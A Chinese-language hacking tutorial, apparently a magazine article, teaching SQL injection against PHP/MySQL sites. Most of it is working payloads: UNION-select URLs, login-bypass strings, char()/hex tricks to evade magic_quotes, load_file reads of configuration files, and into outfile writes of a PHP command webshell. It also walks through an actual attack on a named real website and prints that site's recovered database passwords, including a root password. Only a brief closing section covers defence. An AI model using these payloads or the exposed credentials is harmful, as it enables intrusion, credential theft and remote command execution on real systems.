+----------------+------------+----------------+
root@localhost alpha 5.0.0-alpha-nt
+----------------+------------+----------------+
1 row in set (0.01 sec)
如图(1)所示,图不是很爽是否是？睁大你的大眼睛好好看哦

有时候颇有用的哦，好比说你能够根据他的mysql版本看看他的mysql有没有什么溢出漏洞，没准咱们就发现个好动东哈哈

4. 下面进入最重要的部分了，没睡觉的打起精神来，睡着了的醒一醒啦。
1）select union select
仍是php中文手册中讲的：
SELECT ... UNION [ALL] SELECT ... [UNION SELECT ...]
UNION 在 MySQL 4.0.0 中被实现。
UNION 用于将多个 SELECT 语句的结果联合到一个结果集中。

在 SELECT 中的 select_expression 部分列出的列必须具备一样的类型。第一个 SELECT 查询中使用的列名将做为结果集的列名返回。
SELECT 命令是一个普通的选择命令，可是有下列的限制：
只有最后一个 SELECT 命令能够有 INTO OUTFILE。

须要注意的是union先后的select字段数相同，只有这样union函数才能发挥做用。若是字段数不等将返回
ERROR 1222 (21000) The used SELECT statements have a different number of columns 错误
晕咯，这样很差吧。咋半哩？
别急哈，急也没用的
例如：
已知alphadb表有11列
咱们
mysql; select from alphadb where id=351 union select 1,2,3,4,5,6,7,8,9,10 from alphaauthor;
如图（2）

咱们只slect了10个数固然出错啦。
下面看
mysql; select from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
如图（3）

咱们看看id＝247中的数据先
mysql; select from alphadb where id=347;
+-----+--------------------------------------------+-----------------
id title content importtime author accessing addInto type showup change_ubb change_html
+-----+--------------------------------------------+-----------------
347 利用adsutil.vbs+..--发表于黑客档案2004.6期发表于黑客x档案第6期 2004
-03-28 115050 Alpha 17 Alpha 2 1 1 1
+-----+--------------------------------------------+-----------------
1 row in set (0.00 sec)
咱们看到，它的返回结果和
mysql; select from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
是相同的。
哦，你们或许会问，这样有什么用呢？
问的好。
Ok，继续试验
当咱们输入一个不存在的id的时候
例如id=0，或者id=347 and 1;1
再看看
mysql; select from alphadb where id=347 and 1;1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;
如图（4）

咱们发现它把咱们后面的1,2,3,4,5,6,7,8,9,10,11赋给了各个字段来显示。
哈哈，终于显示不同了，但是这有什么用呢？
先不告诉你。
咱们讲一个具体的例子先
httplocalhostsitedisplay.phpid=347
看看图5

httplocalhostsitedisplay.phpid=347 and 1;1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor
结果如图6

下面咱们用一幅图来总结一下union的用法如图7

Ok，知道怎么利用了不？不知道的话下面将会详细告诉你。
2）LOAD_FILE
这个功能太强大了，这也是林.linx在上一个专题中提到的方法。虽说过了，可我也不得再也不提出来。
Load_file能够返回文件的内容，记得写全文件的路径和文件名称
Etc.
咱们在mysql的命令行下输入

mysql; select load_file('cboot.ini');
效果如图（8）

但是咱们在网页中怎么搞呢？
咱们能够结合union select使用
httplocalhostsitedisplay.phpid=347%20and%201;1%20union%20select%201,2,load_file('capachehtdocssitelibsql.inc'),4,5,6,7,8,9,10,11
这里的capachehtdocssitelibsql.inc并非个人配置文件哦，：P
看仔细图9中的

看看，文件内容暴露无疑。
咱们为何要把load_file('capachehtdocssitelibsql.inc')放在3字段呢？咱们前面提到列类型一共有那么三种，而原来图7中显示3的地方应该是显示文章内容，应该是字符型的，而load_file('capachehtdocssitelibsql.inc')也必定是字符型的，因此咱们猜想放在3字段能够顺利显示。
其实还有不少好的利用方法，继续往下看哦！
3) select from table into outfile'file.txt'
有啥用哩？
做用就是把表的内容写入文件，知道有多重要了吧，咱们写个webshell吧，哈哈。
固然咱们不仅是导出表，咱们还能够导出其它东西的哦，往下看啦。
假设有以下表

#
# 数据表的结构 `test`
#

CREATE TABLE test (
a text,
b text
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

#
# 导出下面的数据库内容 `test`
#

INSERT INTO test VALUES ('php system($cmd); ;', NULL);

已知个人网站路径在Capachehtdocssite
好，看你表演哦，输入
httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,a,4,5,6,7,8,9,10,11%20from%20test%20into%20outfile%20'Capachehtdocssitecmd.php'
意思就是把表里的a列内容导出到cmd.phpzhong
看看cmd.php里的内容先
1 2 php system($cmd); ; 0000-00-00 000000 5 6 7 8 9 10 11
咱们执行一下看看先
httplocalhostsitecmd.phpcmd=dir
如图(10)

哈哈，果真很爽哦！
4）下面给你们讲述LOAD DATA INFILE的故事

LOAD DATA [LOW_PRIORITY] [LOCAL] INFILE 'file_name.txt' [REPLACE IGNORE] INTO TABLE tbl_name

LOAD DATA INFILE语句从一个文本文件中以很高的速度读入一个表中。
由于这个语句通常状况下不能在浏览器里直接输入，因此做用不是很大。

这里举个例子来讲说
表test的结构和上面介绍的同样

#
# 数据表的结构 `test`
#

CREATE TABLE test (
a text,
b text
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

咱们在mysql命令行下输入：
Mysql;load data infile 'ccmd.php' into table test

其中ccmd.php内容为
php system($cmd); ;
注意：上面的内容写在一行里哦。
经过上面的指令咱们就把cmd.asp的内容输入到了test表中
所得结果如图（11）

实际上获得的就是上个例子test表中的内容！看看，再结合into outfile，是否是一个完美的组合呢。
基本的语法就将到这里了，可能还有不少重要的东西漏掉了哦，你能够去php中文手册里淘金，相信你必定会找到不少好东西的，本身挖掘吧。（随光盘咱们付上一个php中文手册）

B从注入方式上
主要有数字型，字符型和搜索类
1. 数字型
很常见了，咱们上面举的就一直是字符型的例子，你们应该还都记得asp下如何破管理员密码，下面咱们来看一下php下如何实现
咱们在地址栏输入：
httplocalhostsitedisplay.phpid=451%20and%201=(select%20min(id)%20from%20alphaauthor)
判断是否存在alphaauthor，若是有返回正常页面（通常状况啦，有的时候也返回其它什么的，这主要根据构造1＝1 和1＝2时的页面判断）

httplocalhostsitedisplay.phpid=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20length(username)=5)
判断是否username字段的长度为5

httplocalhostsitedisplay.phpid=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20length(username)=5%20and%20length(password)=32)
跟上面差很少啦，判断password字段的长度

下面进入猜密码的阶段，用ascii方法来一位一位猜想吧。Ascii等同于asp下的asc，哈哈，常常看黑客X档案的必定很清楚啦。
httplocalhostsitedisplay.phpid=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,1,1))=97)
用户名第一位哦ascii97就是字符a啦

httplocalhostsitedisplay.phpid=451%20and%201=(select%20min(id)%20from%20alphaauthor%20where%20ascii(mid(username,2,1))=108)
第二位啦，这里只放这一个图啦，如图（12）

下面省略X条。
反正咱们最后是得出用户名和密码了。
咱们会发现这里的注入方法几乎和asp下的注入是同样的，就是把asc变成ascii，把len变成length就能够了，最后咱们就能够获得后台的管理员帐号和密码，
固然咱们有更简单的方法，能够直接用union的方法直接获得

httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20alphaauthor
如图（13）

帐号是alpha，密码是一长串的东东，哈哈，简单明了，看到没有，这里显示出了union select的强大威力了吧。

上面讲的是在不通的表里面猜想内容，若是在同一个表里面咱们还能够像下面这样哩：
下面的一段代码根据用户id显示用户信息

php
user.php
………..
$sql = SELECT FROM user WHERE id=$id;
…………

if (!$result)
{
echo wrong;
exit;
}
else
echo 用户信息;
;

猜想方法和上面几乎是同样的，就是咱们不用再用select了。
咱们输入
httplocalhostuser.phpid=1 and length(password)=7
显示用户信息说明咱们猜的正确，呵呵，comeon

httplocalhostuser.phpid=1 and ascii(mid(password,1,1))=97
第一位密码
httplocalhostuser.phpid=1 and ascii(mid(password,2,1))=97
第二位哦，

经过这种方法最终咱们也能够得出id=1的用户的帐号密码

2. 下面咱们来看看字符型的注入方式
在asp中字符型的注入方式很灵活，在php中字符型的注入就主要在
magic_quotes_gpc＝Off的状况下进行了。（除非有另一种状况，先不告诉你）

例如：
php
display.php
……
$query=select from alphadb where id=’”.$id.”’;
…………..
;
这样id就变成字符型的了。
不知道你们发现没有，假如咱们这样写程序的话，安全性会有所提升的哦
呵呵，继续了
好咱们检验是否有注入先
httplocalhostsitedisplay.phpid=451' and 1=1 and ‘’=’
httplocalhostsitedisplay.phpid=451' and 1=2 and ‘’=’
带入到sql语句里就是
select from alphadb where id=’451’and 1=1 and ‘’=’’
select from alphadb where id=’451’and 1=2 and ‘’=’’

若是你发现页面信息不一样的话说明漏洞存在哦
或者
httplocalhostsitedisplay.phpid=451' and 1=1 %23
httplocalhostsitedisplay.phpid=451' and 1=2 %23
%23转化之后就是#，即注释的意思，上面说过了哦
这样的话就不用考虑那个引号的闭合问题了，实际不少时候咱们推荐这种方法。
把它带入到sql语句里就成了
select from alphadb where id=’451’and 1=1 #’
正是咱们想要的哦！
看看效果吧，
httplocalhostsitedisplay.phpid=451' and 1=1 %23
图（14）

正常显示了呓！

httplocalhostsitedisplay.phpid=451' and 1=2 %23
图（15）

显示不正常，哈哈，说明问题存在
咱们继续哦：
httplocalhostsitedisplay.phpid=451’%20and%201=2%20%20union%20select%201,username,password,4,5,6,7,8,9,10,11%20from%20alphaauthor%23
看图（16）

Ok,用户名和密码又出来了哦！
3. 你们一块儿来看看搜索型注入吧
搜索型的语句通常这样写
php
search.php
……
$query=select from alphadb where title like '%$title%';
…………..
;
不知道你们仍是否记得asp里的注入呢？
不过不记得也没有关系的啦，咱们看吧。
咱们构建注入语句吧
在输入框输入
a%' and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from alphaauthor#放到sql语句中成了

select from alphadb where title like '%a%' and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# %'
结果如图17哦

怎么样，出来了吧，哈哈，一切尽在掌握之中。

C：下面咱们从注入地点上在来看一下各类注入攻击方式
1) 首先来看看后台登录哦
代码先
php
login.php
…….
$query=select from alphaauthor where UserName='
.$HTTP_POST_VARS[UserName].' and
Password='. $HTTP_POST_VARS[Password].';
$result=mysql_query($query);
$data=mysql_fetch_array($result);
if ($data)
{
echo “后台登录成功”;
}
esle
{
echo “从新登录”；
exit；
｝

………
;
Username和password没有通过任何处理直接放到sql中执行了。
看看咱们怎么绕过呢？
最经典的仍是那个：
在用户名和密码框里都输入
‘or’’=’
带入sql语句中成了
select from alphaauthor where UserName=’’or’’=’’ and Password=’’or’’=’’
这样带入获得的$data确定为真，也就是咱们成功登录了。
还有其余的绕过方法，原理是同样的，就是想办法让$data返回是真就能够了。
咱们能够用下面的这些中方法哦
1.
用户名和密码都输入’or’a’=’a
Sql成了
select from alphaauthor where UserName=’’or’a’=’a’ and Password=’’or’a’=’a’

2.
用户名和密码都输入’or 1=1 and ‘’=’
Sql成了
select from alphaauthor where UserName=’ ’or 1=1 and ‘’=’’ and Password=’ ’or 1=1 and ‘’=’’
用户名和密码都输入’or 2;1 and ‘’=’
Sql成了
select from alphaauthor where UserName=’ ’or 2;1 and ‘’=’’ and Password=’ ’or 2;1 and ‘’=’’

3.
用户名输入’or 1=1 # 密码随便输入
Sql成了
select from alphaauthor where UserName=’ ’or 1＝1 # and Password=’anything’
后面部分被注释掉了，固然返回仍是真哦。
4.
假设admin的id＝1的话你也能够

用户名输入’or id＝1 # 密码随便输入
Sql成了
select from alphaauthor where UserName=’ ’or id＝1 # and Password=’anything’
如图18

看看效果图19

怎么样？直接登录了哦！

俗话说的好，只有想不到没有作不到。
还有更多的构造方法等着课后本身想啦。

2）第二个经常使用注入的地方应该算是前台资料显示的地方了。
上面已经屡次提到了呀，并且涉及了数字型，字符型等等，这里就再也不重复了哈。
只是举个例子回顾一下
碧海潮声下载站 - v2.0.3 lite有注入漏洞，代码就再也不列出来了
直接看结果
httplocalhostdownindex.phpurl=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
如图20

看看，咱们又获得咱们想要的了
用户名alpha
密码一长串。
为何咱们要把password放在3字段处，把username放在5字段处了，咱们上面已经提过了哦，就是咱们猜想3和5段显示的应该是字符串型，而与咱们要显示的username和password的字段类型应该相同，因此咱们这样放了哦。
为何要用18个字段呢？不知道你们仍是否记得在union select介绍那里咱们提到union必需要求先后select的字段数相同，咱们能够经过增长select的个数来猜想到须要18个字段，只有这样union select的内容才会正常显示哦！
3)其它如资料修改，用户注册的地方主要得有用户等级的应用。
咱们在上面讲述update和insert的时候都已经讲到，由于不是很经常使用，这里就再也不阐述，在下面将会提到一些关于update和insert的高级利用技巧。
二：下面将要进入magic_quotes_gpc＝On时候的注入攻击教学环节了
当magic_quotes_gpc＝On的时候，交的变量中全部的 ' (单引号),
“ (双引号), (反斜线) 和空字符会自动转为含有反斜线的转义字符。
这就使字符型注入的方法化为泡影，这时候咱们就只能注入数字型且没有
Intval()处理的状况了，数字型的咱们已经讲了不少了是吧，因为数字型没有用到单引号天然就没有绕过的问题了，对于这种状况咱们直接注入就能够了。
1）假如是字符型的就必须得像下面这个样子，没有在字符上加引号。

这里咱们要用到一些字符串处理函数先，
字符串处理函数有不少，这里咱们主要讲下面的几个，具体能够参照mysql中文参考手册7.4.10。

char() 将参数解释为整数而且返回由这些整数的ASCII代码字符组成的一个字符串。
固然你也能够用字符的16进制来代替字符，这样也能够的，方法就是在16进制前面加0x，看下面的例子就明白了。

php
login.php
……
$query=select from .$art_system_db_table['user'].
where UserName=$username and Password='.$Pw.';
……
;

假设咱们知道后台的用户名是alpha
转化成ASCII后是char(97,108,112,104,97)
转化成16进制是0x616C706861
（咱们将在光盘中提供16进制和ascii转换工具）
好了直接在浏览器里输入：

httplocalhostsiteadminlogin.phpusername=char(97,108,112,104,97)%23
sql语句变成：

select from alphaAuthor where UserName=char(97,108,112,104,97)# and Password=''
如图21

正如咱们指望的那样，他顺利执行了，咱们获得咱们想要的。
固然咯，咱们也能够这样构造
httplocalhostsiteadminlogin.phpusername=0x616C706861%23
sql语句变成：
select from alphaAuthor where UserName=0x616C706861%23# and Password=''
咱们再一次是成功者了。颇有成就感吧，

或许你会问咱们是否能够把#也放在char()里
实际上char(97,108,112,104,97)至关于’alpha’
注意是alpha上加引号，表示alpha字符串。
咱们知道在mysql中若是执行

mysql; select from dl_users where username=alpha;
ERROR 1054 (42S22) Unknown column 'alpha' in 'where clause'
看返回错误了。由于他会认为alpha是一个变量。因此咱们得在alpha上加引号。
以下
mysql; select from dl_users where username='alpha';
这样才是正确的。
若是你把#号也放到那里去了，就成了’alpha#’
带入sql语句中
select from dl_users where username='alpha#';
固然是什么也没有了，由于连alpha#这个用户都没有。
好，下面咱们再来看个例子，

php
display.php
……
$query=select from .$art_system_db_table['article'].
where type=$type;
……
;

代码根据类型来显示内容，$type没有任何过滤，且没有加引号放入程序中。
假设type中含有xiaohua类，xiaohua的char()转换后是
char(120,105,97,111,104,117,97)

咱们构建
httplocalhostdisplay.phptype=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
带入sql语句中为：
select from .$art_system_db_table['article'].
where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
看看，咱们的用户名和密码照样出来了哦！没有截图，想像一下咯：P

2) 或许有人会问，在magic_quotes_gpc＝On的状况下功能强大的load_file()还能不能用呢？
这正是咱们下面要将的问题了，load_file()的使用格式是load_file(‘文件路径’)
咱们发现只要把‘文件路径’转化成char()就能够了。试试看哦
load_file(‘cboot.ini’)转化成
load_file(char(99,58,47,98,111,111,116,46,105,110,105))
图22

放到具体注入里就是
httplocalhostdownindex.phpurl=&dlid=1%20and%201=2%20union%20select%201,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
看图23

看看，咱们看到了boot.ini的内容了哦。
很惋惜的是into outfile’’ 不能绕过，否则就更爽了。可是仍是有一个地方可使用select from table into outfile’’ 那就是….（先卖个关子，下面会告诉你）
三：一些注入技巧，不少都是我的发现哦
1.union select的技巧
UNION 用于将多个 SELECT 语句的结果联合到一个结果集中。在 SELECT 中的 select_expression 部分列出的列必须具备一样的类型。第一个 SELECT 查询中使用的列名将做为结果集的列名返回。
然而有咱们能够用下面的方法来猜想列的类型，但是省去不少时间
咱们先
httplocalhostdownindex.phpurl=&dlid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
图24

看看软件描述里写着3，做者里写着4，咱们就能够猜想3和4的位置是字符型的，咱们再看14前面的是下载次数，这就应该是int型的了，对吧。
好了，咱们根据这里来构建吧，估计username和password也是字符型的。
试试看哦
httplocalhostdownindex.phpurl=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
如图25

哈哈，这种方法只要看看就能够大概猜到了。
2.load_file读写文件的技巧
不知道你有没有发现过在咱们用load_file()读写php文件时不能在网页中显示。例如：
'Capachehtdocssitelibsql.inc.php'转化为16进制为：0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870
咱们构造以下
httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11
如图26

发如今文章内容的地方原本该显示sql.inc.php的，但是却空空之，为什么呢？
咱们看看网页的源代码先
图27

哈哈，看看标记的地方，晕死，原来在这里啊，但是为何哩？
原来html中 ;用于标注，哈哈，明白了吧！下次可得记得在哪里找哦。
4. md5的恶梦
山东大学的王博士最近但是搞md5搞的红透了，咱们也来搞一搞吧，咱们比他更爽，不用计算，哈哈。
md5咱们是有办法绕过的，可是并非哪里均可以，php中的md5函数就不能绕过，由于你输入的全部东西都在里面，根本跑不出。能够绕过的是sql语句中的md5。固然别的sql中的函数也是能够绕过的，道理相同哦。
看例子先：
php
login.php
……
$query=select from alphaauthor where UserName=md5($username) and Password='.$Pw.';
……
;
咱们直接在浏览器提交
httplocalhostadminlogin.phpusername=char(97,98)) or 1=1 %23
带入sql语句成为select from alphaauthor where UserName=md5(char(97,98)) or 1=1 #) and Password='.$Pw.'
记得md5里面放的是字符，由于后面有or 1=2，因此咱们随便放了个char(97,98). Ok，登录成功了哦！看看，md5在咱们面前也没有什么用处。
5. 核心技术，利用php+mysql注入漏洞直接写入webshell。。
直接利用注入获得webshell，这应该是你们都很想的吧，下面就教给你。
这里假设你已经知道了网站所在的物理路径，我这里假设网站路径为capachehtdocssite。网站的mysql链接信息放在libsql.inc.php里
1）适用于magic_quotes_gpc＝Off
假设咱们能够上传图片，或者txt，zip，等其它东西，咱们把咱们的木马改为
jpg后缀的，上传后路径为upload2004091201.jpg
2004091201.jpg中的内容为 php system($cmd); ;
好，咱们开始httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,load_file('Capachehtdocssiteupload2004091201.jpg'),4,5,6,7,8,9,10,11%20into%20outfile'Capachehtdocssiteshell.php'
由于适用了outfile，因此网页显示不正常，可是咱们的任务是完成了。
如图28
咱们赶快去看看httplocalhostsiteshell.phpcmd=dir
如图29

爽否？Webshell咱们已经建立成功了。看到最前面的12了没？那就是咱们select 1，2所输出的！
2）下面再讲一个适用于magic_quotes_gpc＝On的时候保存webshell的方法哦，显然确定也能用在于magic_quotes_gpc＝Off的时候啦。
咱们直接读他的配置文件，用技巧2介绍的方法
httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11
获得sql.inc.php内容为
$connect=@mysql_connect(localhost,root,) or die(Unable to connect to SQL server);mysql_select_db(alpha,$connect) or die(Unable to select database);;
好了咱们知道了mysql的root密码了，咱们找到phpmyadmin的后台
httplocalhostphpmyadmin
用root密码为空登录。
如图30
而后咱们新创建一个表结构内容以下：

#
# 数据表的结构 `te`
#
CREATE TABLE te (
cmd text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

#
# 导出下面的数据库内容 `te`
#
INSERT INTO te VALUES ('php system($cmd); ;');
Ok，是咱们用select from table into outfile’’的时候了
直接在phpmyadmin的sql输入
SELECT FROM `te` into outfile 'Capachehtdocssitecmd1.php';
如图31

Ok，成功执行，咱们去httplocalhostsitecmd1.phpcmd=dir看看效果去
如图32

好爽的一个webshell是吧！哈哈，我也很喜欢。
不过不知道你们有没有发现咱们是在magic_quotes_gpc＝On的状况下完成这项工做的，居然在phpmyadmin里能够不用考虑引号的限制，哈哈，说明什么？说明phpmyadmin太伟大了，这也就是咱们在谈magic_quotes_gpc＝On绕过期所卖的那个关子啦！
6.发现没有咱们还能够利用update和insert来插入咱们的数据，而后来获得咱们的webshell哦，还用上面的那个例子，
php
reg.php
……
$query = INSERT INTO members
VALUES('$id','$login','$pass','$email',’2') ;
……
;
咱们在email的地方输入php system($cmd); ;
假设咱们注册后的id为10
那么咱们能够再找到一个能够注入的地方
httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile'Capachehtdocssitetest.php'
好了，咱们又有了咱们的wenshell了哦。
7.mysql的跨库查询
你们是否是一直据说mysql不能跨库查询啊，哈哈，今天我将要教你们一个好方法，经过这个方法来实现变相的跨库查询，方法就是经过load_file来直接读出mysql中data文件夹下的文件内容，从而实现变态跨库查询。
举个例子啦
在这以前咱们先讲一下mysql的data文件夹下的结构
Data文件夹下有按数据库名生成的文件夹，文件夹下按照表名生成三个后缀为frm,myd,myi的三个文件，例如
Mysql中有alpha数据库，在alpha库中有alphaauthor和alphadb两个表，
Alpha文件夹内容以下图33

其中alphadb.frm放着lphadb表中的数据，alphadb.frm放着表的结构，alphadb.myi中放的内容随mysql的版本不通会有所不一样，具体能够本身用记事本打开来判断。
实验开始
假设咱们知道有另外的一个数据库yminfo210存在，且存在表user，user中放这admin的信息。
咱们
httplocalhostsitedisplay.phpid=451%20and%201=2%20%20union%20select%201,2,load_file('yminfo210user.myd'),4,5,6,7,8,9,10,11
说明一下，load_file默认所在的目录是mysql下的data目录，因此咱们用
load_file('yminfo210user.myd')，固然load_file('.info210user.myd')也是同样的，注意的是into outfile的默认路径是在所在的数据库文件夹下。

结果如图34

咱们看读出来的内容
舼  admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer httpwww.yoursite.com (靃KA靃靃 127.0.0.1 d  aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd E麷AM麷A 127.0.0.1 222 222222223423
虽然乱码一堆，可是咱们仍是能够看出用户名是admin，密码是698d51a19d8a121ce581499d7b701668，后面其它的是另外的信息。
经过这种方法咱们就实现了曲线跨库，下面的例子中也会提到哦！

说了这么多下面咱们来具体的使用一次，此次测试的对象是国内一著名安全类站点――黑白网络
听人家说黑白有漏洞？咱们一块儿去看看吧。
httpwww.heibai.netdownshow.phpid=5403%20and%201=1
正常显示。
如图35

httpwww.heibai.netdownshow.phpid=5403%20and%201=2
显示不正常。
如图36

好，咱们继续
httpwww.heibai.netdownshow.phpid=5403%20and%201=1 union select 1
显示结果以下
如图37

注意看图中没有显示程序名，并且还附带了
Warning mysql_fetch_object() supplied argument is not a valid MySQL result resource in Dwebheibaidownshow.php on line 45

Warning mysql_fetch_array() supplied argument is not a valid MySQL result resource in Dwebheibaidownglobal.php on line 578

晕了，网站路径出来了，那可就死定了哦！
咱们继续，直到咱们猜到
httpwww.heibai.netdownshow.phpid=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
的时候正常显示了。
如图38

好咱们转换语句成为
httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
显示如图39

看看简介处显示为12，咱们能够猜想此处应该为字符型！
Ok，咱们下面看看文件内容先
Dwebheibaidownshow.php转化成ascii后为
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)
咱们
view-sourcehttpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19
view-source是指察看源代码，至于为何用，咱们后面将讲到
显示出它的源代码
如图40

由于在show.php中有一句
META HTTP-EQUIV=REFRESH CONTENT='0;URL=list.php';
若是咱们直接在浏览器里提交会跳转到list.php
咱们发现这句require (.includeconfig.inc.php);
好东西，应该放这配置文件，ok继续
dwebheibaidownincludeconfig.inc.php
转化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
咱们输入
httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
显示结果如图41

里面内容主要有
…………………..
ymDown (夜猫下载系统) 是一个应用于网站提供下载服务的的程序
------------------------- -------- -------------------------
常规设置
------------------------- -------- -------------------------

数据库信息
$dbhost = localhost; 数据库主机名
$dbuser = download; 数据库用户名
$dbpasswd = kunstar988; 数据库密码
$dbname = download; 数据库名

Cookie 名称
$cookie_name = heibai;
版本号
$version = 1.0.1;

数据表名
$down_table = ymdown;
$down_user_table = ymdown_user;
$down_sort1_table = ymdown_sort1;
$down_sort2_table = ymdown_sort2;
晕原来用的是夜猫的下载系统，并且咱们知道了
$dbuser = download; 数据库用户名
$dbpasswd = kunstar988; 数据库密码
说不定呆会有用哦。
用的表名是默认的表名，咱们知道夜猫的管理员密码放在ymdown_user中
咱们继续httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from ymdown_user
结果如图42

根据提示咱们知道文件大小处的是username，应用平台处的是password（对照图36）
即username=dload，password＝6558428，夜猫的后台默认在admin目录下，我试验了好久都没有找到，晕之。
想直接链接mysql，发现telnet端口并无开放。咱们去看看别的吧！
httpwww.heibai.netviparticlelogin.php
看起来像是会员的登录哦，咱们看看先
dwebheibaiviparticlelogin.php
转化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)
咱们输入
httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19
结果如图43：

其中
require (.includeglobal.php);
require (.includeconfig.inc.php);
require (.mainfunction.php);
require (.function.php);
固然了，咱们去看config.inc.php吧
dwebheibaiviparticleincludeconfig.inc.php
转成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
输入
httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
结果如图44

显示了不少好东西哦

$dbhost = localhost; 数据库主机名
$dbuser = root; 数据库用户名
$dbpass = 234ytr8ut; 数据库密码
$dbname = article; 数据库名
$ymcms_user_table = user;
$ymcms_usergroup_table = usergroup;
$ymcms_userrace_table = userrace;
表仍是默认的表，并且出来了root的密码
要是能连上它的mysql该多好啊，那样咱们就能够into outfile了
痛苦的找了找phpmyadmin，没有找见，或许根本就没有用。
读cwinntphp.ini发现
; Magic quotes
;
; Magic quotes for incoming GETPOSTCookie data.
magic_quotes_gpc = On
55555555，痛苦中，咱们看看能不能搞几个会员帐号
猜想会员帐号放在user表中，咱们直接读data下article文件夹里的user.myd文件
Articleuser.myd转换成
char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)
咱们输入
httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)),13,14,15,16,17,18,19
结果如图45：

晕了，居然没有返回。咱们来读Articleuser.frm
httpwww.heibai.netdownshow.phpid=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,102,114,109)),13,14,15,16,17,18,19
结果如图46

晕了，表结构都在，并且读Articleuser.myi时也成功，但是为何Articleuser.myd读不出来呢要是magic_quotes_gpc＝Off咱们还能够into outfile来看看，但是……
郁闷中，测试就这样结束吧，下面的工做仍是留给大家来完成吧！
文中所述问题已经通知星坤了！
四：php＋mysql注入的防范方法。
在上一期的专题里已经讲了不少的防范方法，这里我就主要讲一下php+mysql注射攻击的防范方法。
你们看到，在magic_quotes_gpc＝On的时候，不少的注射攻击已经没有做用了。
咱们能够利用这个来加固咱们的程序。Addslashes（）函数等同于magic_quotes_gpc＝On，并且与magic_quotes_gpc＝On也不冲突，咱们能够这样过滤
$username = addslashes($username);
$query=SELECT FROM users WHERE userid='$username');
